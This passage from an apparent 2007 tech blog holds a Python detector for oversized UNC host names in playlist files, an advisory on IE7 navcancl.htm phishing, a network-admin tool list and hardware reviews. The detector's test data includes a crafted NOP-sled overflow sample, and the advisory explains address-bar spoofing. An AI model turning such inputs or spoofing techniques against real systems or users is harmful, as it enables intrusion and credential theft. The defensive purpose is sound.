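def unc_host(path: bytes) -> Optional[bytes]:
    """Return the computer-name part of a UNC path, or None if not UNC."""
    if not path.startswith(b"\\\\"):
        return None
    host, _, _ = path[2:].partition(b"\\")
    return host


def check_pls(data: bytes) -> List[str]:
    """Return one finding per suspicious FileN entry (empty list if clean)."""
    findings = []
    for raw in data.split(b"\n"):
        line = raw.rstrip(b"\r")
        match = ENTRY_RE.match(line)
        if not match:
            continue
        index = match.group(1).decode()
        host = unc_host(match.group(2))
        if host is None:
            continue  # local path or URL, no UNC computer name to check
        if len(host) > MAX_UNC_HOST:
            findings.append(
                f"File{index}: UNC host name is {len(host)} bytes "
                f"(limit {MAX_UNC_HOST})"
            )
        if any(b < 0x20 or b > 0x7E for b in host):
            findings.append(f"File{index}: UNC host name has non-printable bytes")
    return findings


# Constructed sample inputs (not real files from the advisory).
BENIGN_PLS = (
    b"[playlist]\r\n"
    b"File1=\\\\fileserver\\music\\track.mp3\r\n"
    b"Title1=Track\r\nLength1=180\r\n"
    b"NumberOfEntries=1\r\nVersion=2\r\n"
)

# Same layout as the crafted playlist: a NOP sled stands in for the
# computer name. The trailing bytes are junk, not the advisory's shellcode.
MALFORMED_PLS = (
    b"[playlist]\r\n"
    b"File1=\\\\" + b"\x90" * 856 + b"\x83\xec\x34" + b"\r\n"
    b"Title1=Test\r\nLength1=512\r\n"
    b"NumberOfEntries=1\r\nVersion=2\r\n"
)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_PLS), ("malformed", MALFORMED_PLS)):
        print(name, check_pls(blob) or "clean")
```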

Phishing Using IE7 Local Resource Vulnerability

Internet Explorer 7.0 is vulnerable to cross-site scripting in one of its local resources. In combination with a design flaw in this specific local resource it is possible for an attacker to easily conduct phishing attacks against IE7 users.

Credit:
The information has been provided by Aviv Raff.
The original article.

Vulnerable Systems:
* Windows Vista - Internet Explorer 7.0
* Windows XP - Internet Explorer 7.0

The navcancl.htm local resource is used by the browser when, for some reason, navigation to a specific page is canceled. When a navigation is canceled, the URL of the specific page is provided to the navcancl.htm local resource after the # sign. For example: res://ieframe.dll/navcancl.htm#http://www.site.com. The navcancl.htm page then generates a script in the "Refresh the page." link in order to reload the provided site when the user clicks on this link. It is possible to inject a script into the provided link which will be executed when the user clicks on the "Refresh the page." link. Luckily, Internet Explorer now runs most of its local resources (including navcancl.htm) in the Internet Zone, so this vulnerability cannot be exploited to conduct remote code execution.

Unfortunately, there is also a design flaw in IE7. The browser automatically removes the URL path of the local resource and leaves only the provided URL. For example: when the user visits res://ieframe.dll/navcancl.htm#http://www.site.com, IE7 will show http://www.site.com in the address bar.

To perform a phishing attack, an attacker can create a specially crafted navcancl.htm local resource link with a script that will display fake content of a trusted site (e.g. bank, PayPal, MySpace). When the victim opens the link that was sent by the attacker, a Navigation Canceled page will be displayed. The victim will think that there was an error in the site or some kind of network error and will try to refresh the page. Once he clicks on the "Refresh the page." link, the attacker's provided content (e.g. a fake login page) will be displayed, and the victim will think that he is within the trusted site, because the address bar shows the trusted site's URL.

Wednesday, March 14, 2007

Technorati news

Technorati Profile

Monday, March 12, 2007

Download Fedora Core 6 Now

Download Now

New to Fedora Core?

If you are new to Fedora Core, please read the full installation instructions. These are also available in a printable version.

Sunday, March 11, 2007

Top Network Administrator Tools

Scanning Tools

Nmap
http://www.nmap.org

Nmap is a port scanner. A port scanner scans for open ports, such as 80 (http) or 25 (SMTP)

Port Scanners - Every computer program and utility that is designed to interact with a network is also assigned a specific port number. A port number can range from 1 to whatever the designer assigns. Your browser uses port 80 because this is the number assigned to HTTP. FTP is 21, mail or SMTP is 25, and POP3 is 110. Because ports are the entrance into any network-ready device, they sometimes have to be blocked off to prevent intrusion. This is where a port scanner comes into play. It can be aimed at a single IP address or an entire network to see which ports are open and available. Because of this, many network administrators limit the number of ports in use. There are several methods of closing off port access: blocking them on your workstation or server, through a security access list on a router or firewall, or using port translation. (Port translation is where all incoming requests for, say, port 80 are translated to port 2080.) A network administrator uses a port scanner to test his or her network, just as a hacker does. Follow this LINK to a series of FREE Scanning tools.
Sam Spade
www.samspade.org/
Sam Spade is a multi-network query tool with many extra built-in utilities, even a tool for spam. It includes utilities such as ping, whois, traceroute, and finger.

NetScanTools Pro ($199)
http://www.netscantools.com/nstmain.html

NetScanTools Pro is an investigation tool that gathers information about the Internet or local LAN users, IP addresses, ports, and many other network specifics. NetScanTools Pro has a Port Scanner, Ping, Traceroute, OS Fingerprinting, NetScanner and custom ICMP packet generator. This tool tests systems and firewalls for vulnerabilities and exposed ports. This utility can also use NetBIOS info to look for open (writeable) Windows shares on the local area network.
SuperScan
http://www.foundstone.com/
SuperScan is a powerful connect-based TCP port scanner, pinger and hostname resolver. Multithreaded and asynchronous techniques make this program extremely fast and versatile. The Foundstone Group has a multitude of free tools and is a division of McAfee.
NetCat
http://netcat.sourceforge.net/

NetCat is a featured networking utility, which reads and writes data across network connections, using the TCP/IP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. This tool can also be used as a port sniffer.

Sniffers/Network Protocol Analyzer
Sniffers and network protocol analyzers capture packets so you can examine them. You can see which resource or port is being used, and where the requesting packets originate. If a program is mailing spam from a computer, you will see the destination address and port 25 being used. Whenever a program sends packets into or out of your system, a sniffer will capture the traffic and display it in a report.
Ethereal
http://www.ethereal.com/
Ethereal is a powerful multi-platform network tool that can be used on Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, viewing summary and detail information for each packet. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. A text-based version called tethereal is included. This is the tool that hackers and network admins prefer.
EtterCap
http://ettercap.sourceforge.net/
Ettercap is a network sniffer/interceptor/logger for Ethernet LANs. It supports active and passive dissection of many protocols. Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.
Snort
http://www.snort.org/

A free intrusion detection system (IDS) for the masses. Snort is a lightweight network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks. It can perform protocol analysis, content searching/matching and can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts, and much more. Snort uses a flexible rule based language to describe traffic that it should collect or pass, and a modular detection engine. Many people also suggested that the Analysis Console for Intrusion Databases (ACID) be used with Snort.
WinDump / TCPDump
http://www.tcpdump.org/wpcap.html

WinDump is the porting to the Windows platform of TCPDump, the most used network sniffer/analyzer for UNIX. WinDump is fully compatible with TCPDump and can be used to watch and diagnose network traffic according to various complex rules. It can run under Windows 95/98/ME, and under Windows NT/2000/XP.
DSniff
http://naughty.monkey.org/~dugsong/dsniff/
DSniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.
Process Enumeration

Viruses, trojans, rootkits, and other host infections that have been executed can show up as processes inside the task manager, but not always. You cannot rely on the task manager to display all processes; this is why it is necessary to have a program that will detail all running processes. Here are a few programs that I like to use to flush out a hiding pest.

Fport

http://www.foundstone.com/
Fport is a great tool that I use often. It reports all open TCP/IP and UDP ports and maps them to the owning application. This is the same information you would see using the 'netstat -an' command, but it also maps those ports to running processes with the PID, process name and path. Fport can be used to quickly identify unknown open ports and their associated applications. Foundstone offers over 30 free networking tools to download from their website.
PsTools
http://www.sysinternals.com/
PsTools is a suite of fantastic and dangerous (in the wrong hands) command line utilities made by Mark Russinovich for Windows. In the right hands (computer professionals), PsTools can automate a computer's shutdown, list a computer's running processes, or kill a process. PsTools is a favorite of network pros and hackers alike. In this book I demonstrate the use of these tools on page:
The tools included in the PsTools suite, which are downloadable individually or as a package, are:
  • PsExec - execute processes remotely
  • PsFile - shows files opened remotely
  • PsGetSid - display the SID of a computer or a user
  • PsKill - kill processes by name or process ID
  • PsInfo - list information about a system
  • PsList - list detailed information about processes
  • PsLoggedOn - see who's logged on locally and via resource sharing (full source is included)
  • PsLogList - dump event log records
  • PsPasswd - changes account passwords
  • PsService - view and control services
  • PsShutdown - shuts down and optionally reboots a computer
  • PsSuspend - suspends processes
  • PsUptime - shows you how long a system has been running since its last reboot (PsUptime's functionality has been incorporated into PsInfo)
Tlist – Microsoft Resource Kit
Tlist is a task list viewer that can be found in the Microsoft Resource Kit. This tool displays a list of IDs, names, and windows of processes running on the local computer. Tlist is the main tool in my arsenal of anti-hacker tools. It allows me to view not only the processes running on the system, but where the program is located within the server. Once you can isolate the alien program running on your system, you can use kill.exe, another Resource Kit tool, to stop it so you can delete it from your system, or Pskill.exe to remove it.
Tasklist – Windows XP
Tasklist displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer.
Syntax
tasklist[.exe] [/s computer] [/u domain\user [/p password]] [/fo {TABLE|LIST|CSV}] [/nh] [/fi FilterName [/fi FilterName2 [ ... ]]] [/m [ModuleName] | /svc | /v]
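Fport's port-to-process view, and the tasklist output documented above, can be reproduced from two built-in commands. The following Python is an added example, not any of the listed tools: it joins constructed `netstat -ano` and `tasklist /fo CSV /nh` output on PID, then flags TCP listeners outside an allowlist and established connections to remote port 25 (the spam case from the sniffer section). The sample lines, process names and function names are constructed for this example.

```python
"""Join netstat -ano and tasklist /fo CSV /nh output on PID (Fport-style).

Added example; the sample output below is constructed, not captured.
On a live system run the two commands and pass their text to
map_ports_to_processes() for the same view.
"""
import csv
import io
from typing import Dict, List, Set

NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       2288
  TCP    192.168.1.10:1052      203.0.113.5:25         ESTABLISHED     2288
  UDP    0.0.0.0:500            *:*                                    1340
"""

TASKLIST_SAMPLE = """\
"svchost.exe","912","Console","0","5,432 K"
"System","4","Console","0","236 K"
"unknownsvc.exe","2288","Console","0","3,100 K"
"lsass.exe","1340","Console","0","6,000 K"
"""


def parse_tasklist_csv(text: str) -> Dict[int, str]:
    """Map PID -> image name from `tasklist /fo CSV /nh` output."""
    names: Dict[int, str] = {}
    for row in csv.reader(io.StringIO(text)):
        if len(row) >= 2 and row[1].isdigit():
            names[int(row[1])] = row[0]
    return names


def parse_netstat(text: str) -> List[dict]:
    """Parse `netstat -ano` rows. UDP rows have no State column."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # banner, header or blank line
        if parts[0] == "TCP":
            proto, local, remote, state, pid = parts[:5]
        else:
            proto, local, remote, pid = parts[:4]
            state = ""
        rows.append({"proto": proto, "local": local, "remote": remote,
                     "state": state, "pid": int(pid)})
    return rows


def map_ports_to_processes(netstat_text: str, tasklist_text: str) -> List[dict]:
    """Attach the owning image name to every socket, like Fport's report."""
    names = parse_tasklist_csv(tasklist_text)
    return [dict(row, image=names.get(row["pid"], "<unknown>"))
            for row in parse_netstat(netstat_text)]


def port_of(addr: str) -> int:
    """Port number from 'host:port' as printed by netstat for IPv4."""
    return int(addr.rsplit(":", 1)[1])


def unexpected_listeners(entries: List[dict], allowed: Set[int]) -> List[dict]:
    """TCP listeners on ports not in the allowlist."""
    return [e for e in entries
            if e["state"] == "LISTENING" and port_of(e["local"]) not in allowed]


def outbound_smtp(entries: List[dict]) -> List[dict]:
    """Established TCP connections to a remote port 25."""
    return [e for e in entries
            if e["proto"] == "TCP" and e["state"] == "ESTABLISHED"
            and port_of(e["remote"]) == 25]


if __name__ == "__main__":
    table = map_ports_to_processes(NETSTAT_SAMPLE, TASKLIST_SAMPLE)
    for e in table:
        print(f'{e["proto"]:4} {e["local"]:22} {e["remote"]:22} '
              f'{e["state"]:12} {e["pid"]:>5} {e["image"]}')
    for e in unexpected_listeners(table, {135, 445}):
        print("unexpected listener:", e["local"], e["image"])
    for e in outbound_smtp(table):
        print("outbound SMTP:", e["remote"], e["image"])
```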
Process Killer
Programs, alien or not, run as processes. Sometimes Windows will not allow you to delete a file that is running as a process until you stop it first. Here are a few programs that you can use to kill a process.

PsKill.exe
From the PsTools suite of utilities.

Kill.exe – This tool can be found with the Windows Resource Kit.

TaskKill – Windows XP

TaskKill is an XP utility that allows you to end one or more tasks or processes. Processes can be killed by process ID or image name.

Syntax
taskkill [/s Computer] [/u Domain\User [/p Password]] [/fi FilterName] [/pid ProcessID | /im ImageName] [/f] [/t]
Wireless

Network Stumbler
http://www.stumbler.net/
Network Stumbler is a free Windows 802.11 (wireless) sniffer. This tool finds open wireless access points, an activity most often referred to as “wardriving”. They also distribute a WinCE version for PDAs known as MiniStumbler. This tool is free but Windows-only, and no source code is provided by its maker.
AirSnort
http://airsnort.shmoo.com/
AirSnort is an 802.11 WEP encryption cracking tool for local area networks. AirSnort operates by passively monitoring transmissions, computing the encryption key once enough packets have been gathered. AirSnort is a Linux-based program that can also be installed on a Windows computer, although doing so is a little tricky.

Microsoft Vulnerability

Microsoft Internet Explorer WinINet.DLL FTP Server Response Parsing Memory Corruption Vulnerability
2007-03-09
http://www.securityfocus.com/bid/22489

Microsoft Windows Server Service Remote Buffer Overflow Vulnerability
2007-03-08
http://www.securityfocus.com/bid/19409

Microsoft Windows OLE32.DLL Word Document Handling Denial Of Service Vulnerability
2007-03-08
http://www.securityfocus.com/bid/22847

Microsoft Excel NULL Pointer Dereference Denial Of Service Vulnerability
2007-03-07
http://www.securityfocus.com/bid/22717

Microsoft Windows OLE Dialog Remote Code Execution Vulnerability
2007-03-06
http://www.securityfocus.com/bid/22483

Microsoft Xbox 360 Privilege Escalation Vulnerability
2007-02-28
http://www.securityfocus.com/bid/22745

Microsoft Internet Explorer Drag and Drop TIF Folder Information Disclosure Vulnerability
2007-02-27
http://www.securityfocus.com/bid/21494

Microsoft Internet Explorer Object Tag TIF Folder Information Disclosure Vulnerability
2007-02-27
http://www.securityfocus.com/bid/21507

Microsoft Internet Explorer DHTML Script Function Remote Code Execution Vulnerability
2007-02-27
http://www.securityfocus.com/bid/21546

Microsoft Internet Explorer Script Error Handling Remote Code Execution Vulnerability
2007-02-27
http://www.securityfocus.com/bid/21552

Microsoft MFC Embedded OLE Object Remote Code Execution Vulnerability
2007-02-26
http://www.securityfocus.com/bid/22476

Microsoft Internet Explorer IMJPCKSI COM Object Instantiation Memory Corruption Vulnerability
2007-02-26
http://www.securityfocus.com/bid/22486

Microsoft Internet Explorer COM Object Instantiation Variant Memory Corruption Vulnerability
2007-02-26
http://www.securityfocus.com/bid/22504

Microsoft Internet Explorer ADODB.Connection Execute Memory Corruption Vulnerability
2007-02-26
http://www.securityfocus.com/bid/20704

Microsoft Office And Microsoft Windows RichEdit Component Remote Code Execution Vulnerability
2007-02-26
http://www.securityfocus.com/bid/21876

Microsoft HTML Help ActiveX Control Remote Code Execution Vulnerability
2007-02-26
http://www.securityfocus.com/bid/22478

Microsoft Step-by-Step Interactive Training Buffer Overflow Vulnerability
2007-02-26
http://www.securityfocus.com/bid/22484

Microsoft Windows Explorer WMF File Handling Denial of Service Vulnerability
2007-02-26
http://www.securityfocus.com/bid/22715

Microsoft Office Publisher Remote Denial of Service Vulnerability
2007-02-26
http://www.securityfocus.com/bid/22724

Microsoft Office 2003 Denial of Service Vulnerability
2007-02-26
http://www.securityfocus.com/bid/22716

Windows Shell User Logon ActiveX Control Create Method Unauthorized User Creation Vulnerability
2007-02-26
http://www.securityfocus.com/bid/22710

Microsoft Office Publisher Unspecified Remote Code Execution Vulnerability
2007-02-26
http://www.securityfocus.com/bid/22702

Multiple Web Browser UTF-7 Cross-Domain Character-Set-Inheritance Vulnerability
2007-02-26
http://www.securityfocus.com/bid/22701

Microsoft Internet Explorer OnUnload Javascript Browser Entrapment Vulnerability
2007-02-23
http://www.securityfocus.com/bid/22680

Microsoft Internet Explorer OnUnload Null Pointer Dereference Vulnerability
2007-02-23
http://www.securityfocus.com/bid/22678

Microsoft Windows ReadDirectoryChangesW Information Disclosure Vulnerability
2007-02-22
http://www.securityfocus.com/bid/22664

Microsoft Antivirus Engine Integer Overflow Vulnerability
2007-02-20
http://www.securityfocus.com/bid/22479

Microsoft Excel DATETIME Remote Code Execution Vulnerability
2007-02-20
http://www.securityfocus.com/bid/20344

Microsoft Excel COLINFO Remote Code Execution Vulnerability
2007-02-20
http://www.securityfocus.com/bid/20391

Microsoft Excel Lotus 1-2-3 File Handling Remote Code Execution Vulnerability
2007-02-20
http://www.securityfocus.com/bid/20345

AMD Conquering 3GHz: Athlon 64 X2 6000+ CPU

X-bit Labs take a look at the AMD Athlon 64 X2 6000+ CPU, the fastest Athlon 64 to date.

The new CPU comes officially clocked at 3 GHz with 1 MB of L2 cache per core. This is the same speed that AMD's Athlon 64 FX-74 chip, which was introduced last year near the end of November, runs at. The core is the same Windsor core which AMD has already used for a couple of its processors, namely the Athlon 64 X2 and Athlon 64 FX-62 solutions. As we briefly discussed earlier, the Athlon 64 X2 6000+ still uses a 90nm manufacturing process. The official price for a single Athlon 64 X2 6400+ in a quantity of 1,000 is $464. The next AMD part with the most similar amount of features, the FX-74, is available at a price of $1,000. Keep in mind, however, that the FX-74 figure is for two processors since a complete package must be bought. In addition, the FX-74 can only be used with AMD's Quad FX platform. AMD declares the maximum thermal power of the Athlon 64 X2 6000+ at 125 W, a figure that is identical to the maximum thermal power of the Athlon 64 FX-62 which also happens to be 200 MHz slower. Nominal voltage is between 1.35V and 1.40V, the same value for other Athlon 64 X2 90nm processors. The integrated memory controller uses a divider set at 8.

Two factors make the overclocking headroom for the new AMD CPU limited. For one, the processor is the highest clocked Athlon 64 X2 processor on the market, meaning that AMD has already pushed the processor to its limit. In addition, the fact that the Athlon 64 X2 6000+ is manufactured using a 90nm process makes it even tougher to have high overclocking hopes for the processor. Please also keep in mind that overclocking capabilities usually vary from chip to chip. Although we might be able to reach high overclocks with some of our chips, there is no guarantee that another would perform exactly the same. The maximum frequency our engineering sample reached in the overclocking tests was 3.255 GHz. We reached this frequency by increasing the bus frequency to 217 MHz and keeping the multiplier at its default 15x. To maintain system stability at this level, the operation required a very slight overvolt. As our tests confirm, the overclocking headroom on Athlon 64 6000+ processors is rather limited, primarily because of the 90nm manufacturing process.

Despite its significantly higher performance rating and $459 retail price, the new AMD Athlon 64 X2 6000+ processor can only compete successfully with the Intel Core 2 Duo E6600, and not in all applications. From the price-to-performance perspective it is losing to the Intel Core 2 Duo at this time. So, the newcomer will have a really hard time winning users' hearts, at least until the prices go down again.
Other reviews can be found on AnandTech, HotHardware, T-Break.
AMD has also launched new single-core Athlon 64 3500+ and Athlon 64 3800+ processors based on its new 65nm process. The two chips run at the same respective 2.2GHz and 2.4GHz clock speeds with the same 512KB of cache as their 90nm predecessors, and they have a rated power consumption of just 45W. The 45W Athlon 64 3500+ is launching at $88, while the 3800+ is $93.

Thursday, March 08, 2007

Sapphire Radeon X1950 PRO AGP Tested

EliteBastards take a further look at the Sapphire Radeon X1950 PRO AGP. The most obvious difference in Sapphire's Radeon X1950 PRO over a reference board is the inclusion of a RIALTO bridge chip on its rear, allowing the core to be used on an AGP interface. That aside, this board also finds itself with small core and memory clock speed boosts over reference speeds, sporting a core clock of 580MHz, with memory clocked at 700MHz - an increase of 5 and 10MHz respectively. To cap it all off, Sapphire have doubled the frame buffer of this board over the reference design, equipping it with 512MB of GDDR3 memory. Impressive stuff indeed.

As review conclusions go, this is a pretty simple one to wrap up in essence - The Radeon X1950 PRO is the fastest, most fully featured graphics board money can buy that makes use of the AGP interface. It brings everything that we loved about RV570 on PCI Express - Great performance and a very solid feature set at a decent price point - Then leverages the lack of competition in the AGP arena to make it look like a King amongst Men. Well, a King amongst graphics boards at least.

As far as Sapphire's Radeon X1950 PRO goes, this most excellent board is complemented nicely by the use of a single-slot cooler, and a very comprehensive bundle that gives you everything you could possibly need, befitting of its high-end stature for the interface on which it resides. There also seems to be little in the way of a price increase over the PCI Express variant of this SKU, which is great to see as well.

Of course, we do have to put forth some negatives for this board, the biggest of which is its power requirements - the need for two Molex connectors may require some juggling of your power supply connectors, if not even upgrading your PSU if it isn't up to the job. High Definition playback also wasn't up to scratch - considering we witnessed frames dropped on both ATI and NVIDIA AGP boards, it suggests to me that H.264 and this ageing interface simply don't sit well together.

Nvidia Creates First Graphics Chip with Embedded DRAM

TSMC and Nvidia today announced that TSMC has successfully produced a fully-functional sample of a graphics chip for handheld devices with embedded DRAM. While there are no details about the product, it once again shows the interest of a leading graphics chips designer towards the eDRAM technology.

TSMC's 65nm embedded DRAM process and IP shrink the cell and macro size by nearly 50 percent compared to its previous generation. The foundry is targeting the higher bandwidth offered by the embedded DRAM at applications such as game consoles, high-end networking, digital consumer, and multimedia processors. The embedded DRAM allows for some of the key power-saving tricks being tapped by designers today, including sleep mode, partial power cut-off and on-chip temperature compensation, while also improving data retention time. The 65-nm embedded DRAM process is built on up to 10 metal layers using copper low-k interconnect and nickel silicide transistor interconnect, the company said. The cell size is less than a quarter of its SRAM counterpart, and macro densities range from 4Mbits to 256Mbits. TSMC began its 65-nm logic production in the second quarter of 2006. Its 90-nm embedded DRAM process has run since the first quarter of 2006.


Seagate 750GB Pushbutton Backup External Hard Drive

TechArp takes a look at the Seagate 750GB Pushbutton Backup External Hard Drive:

Performance-wise, the 750GB Pushbutton Backup had faster read and burst speeds than the VIZO Luxon USB enclosure which we paired with the 750GB Barracuda 7200.10 hard drive. However, the Pushbutton Backup drive was about 9% slower than the Luxon enclosure in the High-End Disk WinMark 99 test. Other than that, both drives had about the same performance characteristics. Since the Pushbutton Backup drive is using the same 750GB Barracuda 7200.10 hard drive or a similar model to the one used with the VIZO Luxon enclosure, any performance difference is due to the SATA-USB controller used. It's good to see that the Pushbutton Backup's controller is no performance slouch.

However, those who buy the Pushbutton Backup will not be buying it merely based on its performance. Its large capacity will be a major selling factor, offering more capacity than competing backup solutions. Those who require a lot of backup capacity will certainly be interested in this drive. Potential buyers will also be interested in its ease of use and reliability. While we can attest to its ease of use (it literally works out of the box!), we find the 1-year limited warranty quite peculiar since the Barracuda 7200.10 hard drive itself comes with a 5-year warranty. Seagate should really give the Pushbutton Backup drive an equivalent warranty.

In conclusion, the Seagate 750GB Pushbutton Backup is really not for everyone. If you are a hardware enthusiast, it would be better and cheaper to buy a Seagate 750GB Barracuda 7200.10 hard drive and install it into an external USB hard drive enclosure. You will even have the full 5-year warranty on the hard drive.

Corsair 2GB PC2-10000C5DF Dominator Memory Kit tested

Legit Reviews has posted a review of the Corsair 2GB PC2-10000C5DF Dominator Memory Kit, which is rated for operation at 1250MHz. These recently released modules are optimized for the new NVIDIA nForce 680i SLI-based platform. In addition, the pair of Corsair CM1X1024-10000C5D modules utilize Corsair's latest heat sink design thanks to their use of the awesome looking black DOMINATOR heat sinks. These heat sinks have Dual-Path Heat Xchange (DHX) technology and can be coupled with the Corsair Dominator Airflow Fan to help keep the modules nice and cool.

One of the major selling points of this kit is that Corsair put together the complete package for consumers. By bundling the Corsair AIRFLOW with the modules it makes for the best overclocking experience we have ever had right out of the box. Just minutes after opening the retail packaging we had the modules up and running above 1300MHz, which is crazy seeing how a couple years ago those speeds were impossible to reach. It makes you wonder what speeds will be reached by the end of the year if things keep going like this.

The performance of the Corsair TWIN2X2048-10000C5SDF 2GB DDR2-10000 Dominator Series was nothing less than impressive. Having the ability to run CAS 3 at 853MHz, CAS 4 at 1135MHz and CAS 5 at 1314MHz makes for a wide range of options for enthusiasts, and these just happen to be some of the best timings that we have ever seen at 2.4V. I can't say enough good things about the overclocking of these modules as they are really impressive. If you don't overclock and adjust the timings on this kit you are really missing out!
When it comes to pricing these modules do cost more than most, but to be honest you get what you pay for with these modules. I've personally had the chance to use several of these TWIN2X2048-10000C5DF memory kits and every single one would do over 1310MHz with CAS 5 timings right out of the box. A number of smaller companies often send out hand-picked samples to 'beta testers' and tell them to post the results around the internet. What happens is people order them and quickly find out that their modules can't reach anywhere near the speeds they saw these other people reaching. Instead of buying two or more kits trying to find a great set of overclockers, save yourself some time and let Corsair do the sorting for you. The fallout rate on finding the right Micron ICs is really high and the supply is tight, so the $649.00 price tag makes sense if you look at the numbers.

AMD Athlon64 X2 4800+ 65nm tested

PC Stats published a review of the AMD Athlon64 X2 4800+ 65nm Processor which comes clocked at a cool 2.5 GHz, with a 12.5x CPU clock multiplier (12.5 x 200 MHz = 2500 MHz). Each core in this dual core Athlon64 X2 4800+ CPU has a 128KB L1 cache along with a 512KB L2 cache. This is a bit different from what AMD did with its Socket 939 series Athlon64 X2 4800+, it ran at 2.4 GHz and had 1MB L2 cache per core.

At 173W (total system power draw) with both cores running at 100%, the 65nm Athlon64 X2 4800+ system uses 4W less energy than the 90nm Athlon64 X2 5000+ with only one core maxed out! The Athlon64 X2 4800+ system consumes 70W less than the Intel Pentium D 940 test rig. Aside from the die shrink from 90nm to 65nm, the AMD Athlon64 X2 4800+ has no significant advancements over previous Socket AM2 Athlon64 processors. AMD has increased the L2 cache latency a bit, in preparation for larger L2 cache K8 processors coming down the pipeline. When we will see these beasts materialize is not known. This does however mean that clock for clock the 65nm processors are just slightly slower than their 90nm counterparts, but as an end user, you won't be able to tell the difference.


As we saw in the benchmarks the Socket AM2 AMD Athlon64 X2 4800+ processor is pretty quick around the track. It slots itself right behind the Athlon64 X2 5000+, exactly where we expect it. The chip offers up good performance for the money. The 65 nm Athlon64 X2 4800+ was a pretty good overclocker, hitting 3.03 GHz in PCSTATS tests. With a retail price of $253 CDN ($215 US, £112GBP) the AMD Athlon64 X2 4800+ is a good balance between performance and value. Its small energy efficient gains will make it less expensive to run in the long term, but with the energy efficiencies posed by the Core 2 Duo, you have to wonder if this is almost a moot point.